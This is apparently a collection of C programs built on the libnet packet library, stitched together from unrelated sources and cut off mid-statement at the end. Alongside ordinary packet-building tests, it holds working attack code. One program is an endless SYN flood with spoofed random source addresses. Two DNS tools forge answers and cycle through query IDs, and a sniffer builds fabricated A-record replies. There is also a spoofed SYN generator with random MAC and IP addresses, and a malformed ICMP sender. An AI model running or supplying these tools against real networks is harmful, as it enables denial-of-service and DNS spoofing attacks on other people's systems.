int main(int argc, char **argv) { int sock, c; u_long src_ip, dst_ip; u_short src_prt, dst_prt; u_char *cp, *buf; printf("UDP packet building/writing test\n"); src_ip = 0; dst_ip = 0; src_prt = 0; dst_prt = 0; while((c = getopt(argc, argv, "d:s:")) != EOF) { switch (c) { /* * We expect the input to be of the form `ip.ip.ip.ip.port`. We * point cp to the last dot of the IP address/port string and * then seperate them with a NULL byte. The optarg now points to * just the IP address, and cp points to the port. */ case 'd': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; dst_prt = (u_short)atoi(cp); if (!(dst_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(1); } break; case 's': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; src_prt = (u_short)atoi(cp); if (!(src_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(1); } break; } } if (!src_ip || !src_prt || !dst_ip || !dst_prt) { usage(argv[0]); exit(EXIT_FAILURE); } buf = malloc(LIBNET_UDP_H + LIBNET_IP_H); if (!buf) { perror("No memory for packet header"); exit(EXIT_FAILURE); } sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("No socket"); exit(EXIT_FAILURE); } libnet_build_ip(LIBNET_UDP_H, 0, 242, 0, 64, IPPROTO_UDP, src_ip, dst_ip, NULL, 0, buf); libnet_build_udp(src_prt, dst_prt, NULL, 0, buf + LIBNET_IP_H); libnet_do_checksum(buf, IPPROTO_UDP, LIBNET_UDP_H); c = libnet_write_ip(sock, buf, LIBNET_UDP_H + LIBNET_IP_H); if (c < LIBNET_UDP_H + LIBNET_IP_H) { fprintf(stderr, "libnet_write_ip\n"); } printf("Completed, wrote %d bytes\n", c); free(buf); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main(int argc, char *argv[]) { int c; u_long src_ip, dst_ip; u_short src_prt, dst_prt; u_char *cp; char errbuf[256]; char *device = NULL; struct libnet_link_int *l; printf("link layer TCP packet building/writing test\n"); src_ip = 0; dst_ip = 0; src_prt = 0; dst_prt = 0; while ((c = getopt(argc, argv, "i:d:s:")) != EOF) { switch (c) { /* * We expect the input to be of the form `ip.ip.ip.ip.port`. We * point cp to the last dot of the IP address/port string and * then seperate them with a NULL byte. The optarg now points to * just the IP address, and cp points to the port. */ case 'd': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; dst_prt = (u_short)atoi(cp); if (!(dst_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(1); } break; case 's': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; src_prt = (u_short)atoi(cp); if (!(src_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(1); } break; case 'i': device = optarg; break; default: exit(EXIT_FAILURE); } } if (!src_ip || !src_prt || !dst_ip || !dst_prt || !device) { usage(argv[0]); exit(EXIT_FAILURE); } if ((l = libnet_open_link_interface(device, errbuf)) == NULL) { fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf); exit(EXIT_FAILURE); } c = send_tcp(l, device, src_ip, src_prt, dst_ip, dst_prt); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main(int argc, char **argv) { int sock, n, c, p_num; struct libnet_arena arena, *arena_p; u_char *packets[10]; u_long src_ip, dst_ip; printf("ICMP_ECHO / Arena allocator test\n"); src_ip = 0; dst_ip = 0; while((c = getopt(argc, argv, "d:s:")) != EOF) { switch (c) { case 'd': if (!(dst_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(1); } break; case 's': if (!(src_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(1); } break; } } if (!src_ip || !dst_ip) { usage(argv[0]); exit(EXIT_FAILURE); } arena_p = &arena; p_num = 10; if (libnet_init_packet_arena(&arena_p, p_num, LIBNET_ICMP_ECHO_H + LIBNET_IP_H) == -1) { fprintf(stderr, "libnet_init_packet_arena failed\n"); exit(EXIT_FAILURE); } else { printf("Allocated an arena of %ld bytes..\n", LIBNET_GET_ARENA_SIZE(arena)); } /* * Open our raw IP socket and set IP_HDRINCL. */ sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("No socket"); exit(EXIT_FAILURE); } for (n = 0; n < p_num; n++) { printf("%ld bytes remaining in arena\n", LIBNET_GET_ARENA_REMAINING_BYTES(arena)); packets[n] = libnet_next_packet_from_arena(&arena_p, LIBNET_ICMP_ECHO_H + LIBNET_IP_H); if (!packets[n]) { fprintf(stderr, "Arena is empty\n"); continue; } /* * Build the IP header (shown exploded for commenting). */ libnet_build_ip(LIBNET_ICMP_ECHO_H, /* Size of the payload */ IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* IP tos */ 242, /* IP ID */ 0, /* Frag stuff */ 48, /* TTL */ IPPROTO_ICMP, /* Transport protocol */ src_ip, /* Source IP */ dst_ip, /* Destination IP */ NULL, /* Pointer to payload (none) */ 0, packets[n]); /* Packet header memory */ /* * Build the ICMP header. */ libnet_build_icmp_echo(ICMP_ECHO, /* type */ 0, /* code */ 242, /* id */ 1, /* seq */ NULL, /* pointer to payload */ 0, /* size of payload */ packets[n] + LIBNET_IP_H); /* packet header memory */ if (libnet_do_checksum(packets[n], IPPROTO_ICMP, LIBNET_ICMP_ECHO_H) == -1) { fprintf(stderr, "Can't do checksum!\n"); } /* * Write the packet to the network. */ c = libnet_write_ip(sock, packets[n], LIBNET_ICMP_ECHO_H + LIBNET_IP_H); if (c < LIBNET_ICMP_ECHO_H + LIBNET_IP_H) { fprintf(stderr, "write_ip\n"); } printf("Completed %d of %d, wrote %d bytes\n", n + 1, p_num, c); } libnet_destroy_packet_arena(&arena_p); /* Blah. */ return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main (int argc, char **argv) { u_long src_ip, /* source address */ dst_ip; /* destination address */ u_short src_port, /* source port */ dst_port, /* destination port */ id; /* dns id we are spoofing */ int i, /* loop counter */ written_bytes, /* number of bytes written */ packet_size, /* size of our packet */ payload_size, /* size of our payload */ npackets, /* num of packet to write */ socket; /* socket to write on */ u_char *packet, /* we build this */ *payload; /* we send this */ if (argc < 7) { printf("\nusage: answer_dns <source_ip> <port> <destination_ip> <port> <dns_id> <#_packets>\n"); exit (EXIT_FAILURE); } if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1) libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n"); src_ip = libnet_name_resolve(argv[1], 0); dst_ip = libnet_name_resolve(argv[3], 0); src_port = (u_short) atoi(argv[2]); dst_port = (u_short) atoi(argv[4]); id = (u_short) atoi(argv[5]); npackets = (int) atoi(argv[6]); payload = /* question section name/types, size: 21 */ "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01" /* answer section, names/types, size: 21 */ "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01" /* answer section, ttl, size: 4 */ "\xff\xff\xff\xff" /* answer section, rdata length, size: 2 */ "\x00\x04" /* answer section, rdata, size: 4 */ "\x81\x51\xe0\x43"; payload_size = 52; /* * packet memory allocation */ packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H; libnet_init_packet(packet_size, &packet); if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n"); /* * ip header construction */ libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H, 0, /* ip tos */ 10951, /* ip id */ 0, /* fragmentation bits */ 64, /* ttl */ IPPROTO_UDP, /* protocol */ src_ip, /* source address */ dst_ip, /* destination address */ NULL, /* payload */ 0, /* payload length */ packet); /* packet buffer */ /* * udp header construction * during debugging i found that we weren't generating the correct * length here, that is why a payload length is included (payload + dns_header) * it really shouldn't be here though */ libnet_build_udp(src_port, /* source port */ dst_port, /* destination port */ NULL, /* payload */ payload_size + 12, /* payload length */ packet + LIBNET_IP_H); /* * write npackets * we loop from here because we must change the dns id and also re-checksum */ printf("\nwriting packets"); for (i = 0; i < npackets; i++) { printf("."); /* * dns header construction */ libnet_build_dns(id+i, /* dns id */ 0x8180, /* control flags */ 1, /* number of questions */ 1, /* number of answer RR's */ 0, /* number of authority RR's */ 0, /* number of additional RR's */ payload, /* payload */ payload_size, /* payload length */ packet + LIBNET_IP_H + LIBNET_UDP_H); /* * calculate checksum */ libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H); /* * write packet */ written_bytes = libnet_write_ip(socket, packet, packet_size); /* * make sure the number of written bytes jives with what we expect */ if (written_bytes < packet_size) libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size); } /* * cleanup */ libnet_destroy_packet(&packet); if (libnet_close_raw_sock(socket) == -1) libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface"); printf("\n"); return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main(int argc, char *argv[]) { u_long dest_ip; u_short dest_port; u_char errbuf[LIBNET_ERRBUF_SIZE], *packet; int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H; if(argc < 3) { printf("使用方法:\n%s\t <対象ホスト> <対象ポート>\n", argv[0]); exit(1); } dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // ホスト dest_port = (u_short) atoi(argv[2]); // ポート番号 network = libnet_open_raw_sock(IPPROTO_RAW); // ネットワークインタフェースをオープンする if (network == -1) libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n"); libnet_init_packet(packet_size, &packet); // パケット用のメモリを割り当てる if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n"); libnet_seed_prand(); // 乱数生成器に種を与える printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)); while(1) // 永久ループ(CTRL-Cで終了されるまで) { libnet_build_ip(LIBNET_TCP_H, // IPヘッダを除いたパケットのサイズ IPTOS_LOWDELAY, // IP tos libnet_get_prand(LIBNET_PRu16), // IP ID(乱数化) 0, // 断片化 libnet_get_prand(LIBNET_PR8), // TTL (乱数化) IPPROTO_TCP, // トランスポートプロトコル libnet_get_prand(LIBNET_PRu32), // 送信元IP (乱数化) dest_ip, // 宛先IP NULL, // ペイロード(なし) 0, // ペイロード長 packet); // パケットヘッダメモリ libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // 送信元TCPポート (乱数化) dest_port, // 宛先TCPポート libnet_get_prand(LIBNET_PRu32), // シーケンス番号 (乱数化) libnet_get_prand(LIBNET_PRu32), // ACK番号 (乱数化) TH_SYN, // コントロールフラグ (SYNフラグのみ設定) libnet_get_prand(LIBNET_PRu16), // ウィンドウサイズ (乱数化) 0, // 至急ポインタ NULL, // ペイロード (なし) 0, // ペイロード長 packet + LIBNET_IP_H); // パケットヘッダメモリ if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n"); byte_count = libnet_write_ip(network, packet, packet_size); // パケットを注入する if (byte_count < packet_size) libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size); usleep(FLOOD_DELAY); // FLOOD_DELAYミリ秒待機する } libnet_destroy_packet(&packet); // パケットメモリを解放する if (libnet_close_raw_sock(network) == -1) // ネットワークインタフェースをクローズする libnet_error(LIBNET_ERR_WARNING, "can't close network interface."); return 0; }
int main(int argc, char **argv) { int sock, c; u_long src_ip, dst_ip; u_short src_prt, dst_prt; u_char *cp, *buf; u_char *payload = "hello world"; u_char *options = " This here is a 40-byte IP option list."; int payload_s = strlen(payload); int option_s = strlen(options); struct ipoption ipopt; src_ip = 0; dst_ip = 0; src_prt = 0; dst_prt = 0; printf("IP + options and TCP + payload packet building/writing test\n"); while((c = getopt(argc, argv, "d:s:")) != EOF) { switch (c) { /* * We expect the input to be of the form `ip.ip.ip.ip.port`. We * point cp to the last dot of the IP address/port string and * then seperate them with a NULL byte. The optarg now points to * just the IP address, and cp points to the port. */ case 'd': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; dst_prt = (u_short)atoi(cp); if (!(dst_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 's': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; src_prt = (u_short)atoi(cp); if (!(src_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; } } if (!src_ip || !src_prt || !dst_ip || !dst_prt) { usage(argv[0]); exit(EXIT_FAILURE); } /* * Get packet memory. Let's get plenty. */ buf = malloc(IP_MAXPACKET); if (!buf) { perror("No memory for packet"); exit(EXIT_FAILURE); } /* * Open our raw IP socket and set IP_HDRINCL. */ sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("No socket"); exit(EXIT_FAILURE); } /* * Build the IP header (shown exploded for commenting). */ libnet_build_ip(LIBNET_TCP_H + payload_s,/* Size of the payload */ 0, /* IP tos */ 242, /* IP ID */ 0, /* Frag stuff */ 48, /* TTL */ IPPROTO_TCP, /* Transport protocol */ src_ip, /* Source IP */ dst_ip, /* Destination IP */ NULL, /* Pointer to payload (none) */ 0, buf); /* Packet header memory */ /* * Build the TCP header. */ libnet_build_tcp(src_prt, /* Source TCP port */ dst_prt, /* Destination TCP port */ 11111, /* Sequence number */ 99999, /* Acknowledgement number */ TH_SYN|TH_ACK, /* Control flags */ 1024, /* Window size */ 0, /* Urgent pointer */ payload, /* Pointer to payload */ payload_s, buf + LIBNET_IP_H); /* Packet header memory */ /* * Calculate the TCP header checksum (IP header checksum is *always* done * by the kernel. */ libnet_do_checksum(buf, IPPROTO_TCP, LIBNET_TCP_H + payload_s); memcpy(ipopt.ipopt_list, options, option_s); *(ipopt.ipopt_list) = IPOPT_SECURITY; *(ipopt.ipopt_list + 1) = 1; /* * Insert the IP options. */ c = libnet_insert_ipo(&ipopt, /* pointer to ipopt struct */ option_s, /* Length of option list */ buf); /* Packet header memory */ if (c == -1) { fprintf(stderr, "Can't add options, discarding them.\n"); } /* * Write the packet to the network. */ c = libnet_write_ip(sock, buf, LIBNET_TCP_H + LIBNET_IP_H + payload_s + option_s); if (c < LIBNET_TCP_H + LIBNET_IP_H + payload_s + option_s) { fprintf(stderr, "libnet_write_ip: %s\n", strerror(errno)); } printf("Completed, wrote %d bytes\n", c); free(buf); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c, i; struct libnet_link_int *llif; char ebuf[PCAP_ERRBUF_SIZE]; u_char sha[ETHER_ADDR_LEN], tha[ETHER_ADDR_LEN]; in_addr_t src, dst; u_short sport, dport; u_int32_t seq; u_char pkt[ETH_H + IP_H + TCP_H]; while ((c = getopt(argc, argv, "vs:d:e:x:y:i:n:h?V")) != -1) { switch (c) { case 'v': break; case 's': Src = libnet_name_resolve(optarg, 0); break; case 'd': Dst = libnet_name_resolve(optarg, 0); break; case 'e': Tha = (u_char *)ether_aton(optarg); break; case 'x': Sport = atoi(optarg); break; case 'y': Dport = atoi(optarg); break; case 'i': Intf = optarg; break; case 'n': Repeat = atoi(optarg); break; default: usage(); } } argc -= optind; argv += optind; if (argc != 0) usage(); if (!Intf && (Intf = pcap_lookupdev(ebuf)) == NULL) errx(1, "%s", ebuf); if ((llif = libnet_open_link_interface(Intf, ebuf)) == 0) errx(1, "%s", ebuf); libnet_seed_prand(); for (i = 0; i != Repeat; i++) { gen_mac(sha); if (Tha == NULL) gen_mac(tha); else memcpy(tha, Tha, sizeof(tha)); if (Src != 0) src = Src; else src = libnet_get_prand(PRu32); if (Dst != 0) dst = Dst; else dst = libnet_get_prand(PRu32); if (Sport != 0) sport = Sport; else sport = libnet_get_prand(PRu16); if (Dport != 0) dport = Dport; else dport = libnet_get_prand(PRu16); seq = libnet_get_prand(PRu32); libnet_build_ethernet(tha, sha, ETHERTYPE_IP, NULL, 0, pkt); libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 64, IPPROTO_TCP, src, dst, NULL, 0, pkt + ETH_H); libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512, 0, NULL, 0, pkt + ETH_H + IP_H); libnet_do_checksum(pkt + ETH_H, IPPROTO_IP, IP_H); libnet_do_checksum(pkt + ETH_H, IPPROTO_TCP, TCP_H); if (libnet_write_link_layer(llif, Intf, pkt, sizeof(pkt)) < 0) errx(1, "write"); fprintf(stderr, "%s ", ether_ntoa((struct ether_addr *)sha)); fprintf(stderr, "%s %s.%d > %s.%d: S %u:%u(0) win 512\n", ether_ntoa((struct ether_addr *)tha), libnet_host_lookup(Src, 0), sport, libnet_host_lookup(Dst, 0), dport, seq, seq); } exit(0); }
int main(int argc, char **argv) { int sock, c; u_long src_ip, dst_ip; u_short src_prt, dst_prt; u_char *cp, *buf; printf("TCP packet building/writing test\n"); src_ip = 0; dst_ip = 0; src_prt = 0; dst_prt = 0; while((c = getopt(argc, argv, "d:s:")) != EOF) { switch (c) { /* * We expect the input to be of the form `ip.ip.ip.ip.port`. We * point cp to the last dot of the IP address/port string and * then seperate them with a NULL byte. The optarg now points to * just the IP address, and cp points to the port. */ case 'd': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; dst_prt = (u_short)atoi(cp); if (!(dst_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 's': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; src_prt = (u_short)atoi(cp); if (!(src_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; } } if (!src_ip || !src_prt || !dst_ip || !dst_prt) { usage(argv[0]); exit(EXIT_FAILURE); } /* * Get our block of memory for the packet. In this case, we only need * memory for the packet headers. */ buf = malloc(IP_MAXPACKET); if (!buf) { perror("No memory for packet header"); exit(EXIT_FAILURE); } /* * Open our raw IP socket and set IP_HDRINCL. */ sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("No socket"); exit(EXIT_FAILURE); } /* * Build the IP header (shown exploded for commenting). */ libnet_build_ip(LIBNET_TCP_H, /* Size of the payload */ IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* IP tos */ 242, /* IP ID */ 0, /* Frag stuff */ 48, /* TTL */ IPPROTO_TCP, /* Transport protocol */ src_ip, /* Source IP */ dst_ip, /* Destination IP */ NULL, /* Pointer to payload (none) */ 0, buf); /* Packet header memory */ /* * Build the TCP header. */ libnet_build_tcp(src_prt, /* Source TCP port */ dst_prt, /* Destination TCP port */ 11111, /* Sequence number */ 99999, /* Acknowledgement number */ TH_SYN, /* Control flags */ 1024, /* Window size */ 0, /* Urgent pointer */ NULL, /* Pointer to payload (none) */ 0, buf + LIBNET_IP_H); /* Packet header memory */ /* * Calculate the TCP header checksum (IP header checksum is *always* done * by the kernel. */ libnet_do_checksum(buf, IPPROTO_TCP, LIBNET_TCP_H); /* * Write the packet to the network. */ c = libnet_write_ip(sock, buf, LIBNET_TCP_H + LIBNET_IP_H); if (c < LIBNET_TCP_H + LIBNET_IP_H) { fprintf(stderr, "libnet_write_ip\n"); } printf("Completed, wrote %d bytes\n", c); free(buf); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
/****************************************************************************** * parse_dns * * * * take a packet and print it (verbose or not) * * store relevant information in our cc struct * * arg1: (char *) pointer to packet * * arg2: (int) captured packet length * * ret: none * ******************************************************************************/ void parse_dns (char *packet, int caplen) { struct ip *ip; /* ip header */ struct udphdr *udp; /* udp header */ struct dnshdr *dns; /* dns header */ char *data, /* pointer to dns payload */ *data_backup, /* we modify data so keep orig */ name[128]; /* storage for lookup name */ u_long rdata; /* rdata in network byte order */ int datalen, /* length of dns payload */ c = 1, /* used in name extraction */ i; /* loop counter */ ip = (struct ip *) (packet + offset); udp = (struct udphdr *) (packet + offset + LIBNET_IP_H); dns = (struct dnshdr *) (packet + offset + LIBNET_IP_H + LIBNET_UDP_H); data = (packet + offset + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H); /* * we modify the data pointer, so save the original position */ data_backup = data; /* * print dns packet source_address:port > destination_address:port */ printf("\ndns activity: %s:%d > ", inet_ntoa(ip->ip_src), ntohs(udp->uh_sport)); printf("%s:%d", inet_ntoa(ip->ip_dst), ntohs(udp->uh_dport)); /* * clean out our name array and grab length of name to convert */ memset(name, '\0', sizeof(name)); datalen = strlen(data); #if defined DEBUG printf("\nDEBUG> datalen: %d", datalen); #endif /* * convert name... * dns names are of the form 3www7redhive3com * we need to convert it to the more friendly www.redhive.com */ if (dn_expand((u_char *)dns, packet + caplen, data, name, sizeof(name)) < 0) return; /* * restore the data pointer */ data = data_backup; /* kill the trailing '.' */ name[datalen-1] = '\0'; /* * are we looking at a question or an answer? */ if (htons(dns->qdcount) > 0 && htons(dns->ancount) == 0) printf("\t[%s = ?]", name); else if (htons(dns->ancount) > 0) printf("\t[%s = real answer]", name); /* * what type of question is it? */ #if defined DEBUG printf("\nDEBUG> data: %#x", *(data+datalen+2)); if ( ((int)*(data+datalen+2)) == T_A) printf("\nDEBUG> type: A"); if ( ((int)*(data+datalen+2)) == T_PTR) printf("\nDEBUG> type: PTR"); #endif /* * print more verbose packet information */ if (vflag) { printf("\ndns id: %d", ntohs(dns->id)); printf("\nrecursion desired: %d", dns->rd); printf("\ntruncated message: %d", dns->tc); printf("\nauthoritive answer: %d", dns->aa); printf("\nopcode: %d", dns->opcode); printf("\nresponse flag: %d", dns->qr); printf("\nresponse code: %d", dns->rcode); printf("\nrecursion available: %d", dns->ra); printf("\nnumber questions: %d", htons(dns->qdcount)); printf("\nnumber answers: %d", htons(dns->ancount)); printf("\nnumber authority: %d", htons(dns->nscount)); } /* print seperator */ printf("\n--"); /* * bake the chewycenter */ chewycenter.src_address = ip->ip_src.s_addr; chewycenter.dst_address = ip->ip_dst.s_addr; chewycenter.src_port = udp->uh_sport; chewycenter.dst_port = udp->uh_dport; chewycenter.dns_id = dns->id; /* * we only spoof packets from nameservers * if the source of the question is not a client * we don't waste any time building a packet, simply return */ if (ntohs(chewycenter.dst_port) != 53) { return; } /* * check the question type * the question type is stored in the 2 bytes after the variables length name * if the question is not of type A we return since we are only spoofing those type answers */ if ( ((int)*(data+datalen+2)) == T_A) chewycenter.is_a = 1; else { chewycenter.is_a = 0; return; } /* * we start clean withno answer, also we set the current question */ chewycenter.current_answer = NULL; strncpy(chewycenter.current_question, name, 128); /* * if there is a fabrication table search the list for an appropriate entry */ if (fflag) chewycenter.current_answer = search_table(name); /* * if an entry was not found and a default address is specified use it */ if (!chewycenter.current_answer && dflag) { chewycenter.current_answer = chewycenter.default_answer; } /* * if an entry was not found and a default address is not specified then we ignore packet */ if (!chewycenter.current_answer && !dflag) { chewycenter.have_answer = 0; return; } /* * if we've gotten this far it means that we have an answer to write */ chewycenter.have_answer = 1; /* * convert rdata from char * to something useable (unsigned long in network byte order) */ rdata = libnet_name_resolve(chewycenter.current_answer, 0); /* * build the payload * * payload format: (very rudimentary ascii diagram) * +-------------------------------|----------------------|--------------+ * | variable length question name | 2 byte question type | 2 byte class | * |-------------------------------|----------------------|--------------| * | variable length answer name | 2 byte question type | 2 byte class | * |-------------------------------|----------------------|--------------| * | 4 byte time to live | 2 byte rdata length | 4 byte rdata | * +-------------------------------|----------------------|--------------+ * * good lord is this ugly, but it works * 00 00 00 00 00 04 = 4 byte ttl + 2 byte rdata length * rdata length is always 4, this is because we are only dealing with T_A * hence rdata will always be a dotted quad */ memcpy(chewycenter.payload, data, datalen + 5); memcpy(chewycenter.payload + datalen + 5, data, datalen + 5); memcpy(chewycenter.payload + 2 * (datalen + 5), "\x00\x00\x00\x00\x00\x04", 6); *((u_long *)(chewycenter.payload + 2 * (datalen + 5) + 6 + 0)) = rdata; chewycenter.payload_size = 2 * (datalen + 5) + 10; #if defined DEBUG printf("\nDEBUG>\ndata [%d]: ", datalen); for (i = 0; i < datalen+5; i++) printf("%x ", data[i]); printf("\n"); printf("\nDEBUG>\nchewycenter [%d]: ", chewycenter.payload_size); for (i = 0; i < chewycenter.payload_size; i++) printf("%x ", chewycenter.payload[i]); printf("\n"); #endif }
int main (int argc, char **argv) { u_long src_ip, /* source address */ dst_ip; /* destination address */ u_short src_port, /* source port */ dst_port, /* destination port */ id; /* dns id we are spoofing */ int written_bytes, /* number of bytes written */ packet_size, /* size of our packet */ payload_size, /* size of our payload */ socket; /* socket to write on */ u_char *packet, /* we build this */ *payload; /* we send this */ if (argc < 6) { printf("\nusage: ask_dns <source_ip> <port> <destination_ip> <port> <dns_id>\n"); exit (EXIT_FAILURE); } if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1) libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n"); src_ip = libnet_name_resolve(argv[1], 0); dst_ip = libnet_name_resolve(argv[3], 0); src_port = (u_short) atoi(argv[2]); dst_port = (u_short) atoi(argv[4]); id = (u_short) atoi(argv[5]); payload = "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"; payload_size = 21; /* * packet memory allocation */ packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H; libnet_init_packet(packet_size, &packet); if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n"); /* * ip header construction */ libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H, 0, /* ip tos */ 0, /* ip id */ 0, /* fragmentation bits */ 64, /* ttl */ IPPROTO_UDP, /* protocol */ src_ip, /* source address */ dst_ip, /* destination address */ NULL, /* payload */ 0, /* payload length */ packet); /* packet buffer */ /* * udp header construction * during debugging i found that we weren't generating the correct * length here, that is why a payload length is included (payload + dns_header) * it really shouldn't be here though */ libnet_build_udp(src_port, /* source port */ dst_port, /* destination port */ NULL, /* payload */ 33, /* payload length */ packet + LIBNET_IP_H); /* * dns header construction */ libnet_build_dns(id, /* dns id */ 0x0100, /* control flags */ 1, /* number of questions */ 0, /* number of answer RR's */ 0, /* number of authority RR's */ 0, /* number of additional RR's */ payload, /* payload */ payload_size, /* payload length */ packet + LIBNET_IP_H + LIBNET_UDP_H); /* * calculate checksum */ libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H); /* * write packet */ written_bytes = libnet_write_ip(socket, packet, packet_size); /* * make sure the number of written bytes jives with what we expect */ if (written_bytes < packet_size) libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size); /* * we're done with this packet */ libnet_destroy_packet(&packet); /* * we're done writing */ if (libnet_close_raw_sock(socket) == -1) libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface"); return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main(int argc, char **argv) { u_long src_ip = 0, dst_ip = 0, ins_src_ip = 0, ins_dst_ip = 0; u_long *problem = NULL; u_char *packet = NULL; int sock, c, len = 0; long acx, count = 1; struct icmp *icmp; struct ip *ip; /* It appears that most IP options of length >0 will work * Works with 128, 64, 32, 16... And the normal ones 137... * Does not work with 0, 1 */ u_char data[] = {137}; int data_len = sizeof(data); printf("Written by Mike Frantzen... <*****@*****.**>\n"); printf("For test purposes only... yada yada yada...\n"); src_ip = inet_addr("10.10.10.10"); while ( (c = getopt(argc, argv, "d:s:D:S:l:c:")) != EOF ) { switch(c) { case 'd': dst_ip = libnet_name_resolve(optarg, 1); break; case 's': src_ip = libnet_name_resolve(optarg, 1); break; case 'D': ins_dst_ip = name_resolve(optarg, 1); break; case 'S': ins_src_ip = name_resolve(optarg, 1); break; case 'l': data_len = atoi(optarg); break; case 'c': if ( (count = atol(optarg)) < 1) count = 1; break; default: printf("Don't understand option.\n"); exit(-1); } } if ( dst_ip == 0 ) { printf("Usage: %s\t -d <destination IP>\t[-s <source IP>]\n", rindex(argv[0], '/') == NULL ? argv[0] : rindex(argv[0], '/') + 1); printf("\t\t[-S <inner source IP>]\t[-D <inner dest IP>]\n"); printf("\t\t[-l <data length>]\t[-c <# to send>]\n"); exit(-1); } if ( ins_dst_ip == 0 ) ins_dst_ip = src_ip; if ( ins_src_ip == 0 ) ins_src_ip = dst_ip; if ( (packet = malloc(1500)) == NULL ) { perror("malloc: "); exit(-1); } if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) { perror("socket: "); exit(-1); } /* 8 is the length of the ICMP header with the problem field */ len = 8 + IP_H + data_len; bzero(packet + IP_H, len); libnet_build_ip(len, /* Size of the payload */ 0xc2, /* IP tos */ 30241, /* IP ID */ 0, /* Frag Offset & Flags */ 64, /* TTL */ IPPROTO_ICMP, /* Transport protocol */ src_ip, /* Source IP */ dst_ip, /* Destination IP */ NULL, /* Pointer to payload */ 0, packet); /* Packet memory */ /* ICMP Header for Parameter Problem * --------------+---------------+---------------+--------------- *| Type (12) | Code (0) | Checksum | * --------------+---------------+---------------+--------------- *| Pointer | unused | * --------------+---------------+---------------+--------------- * Internet Header + 64 bits of original datagram data.... */ icmp 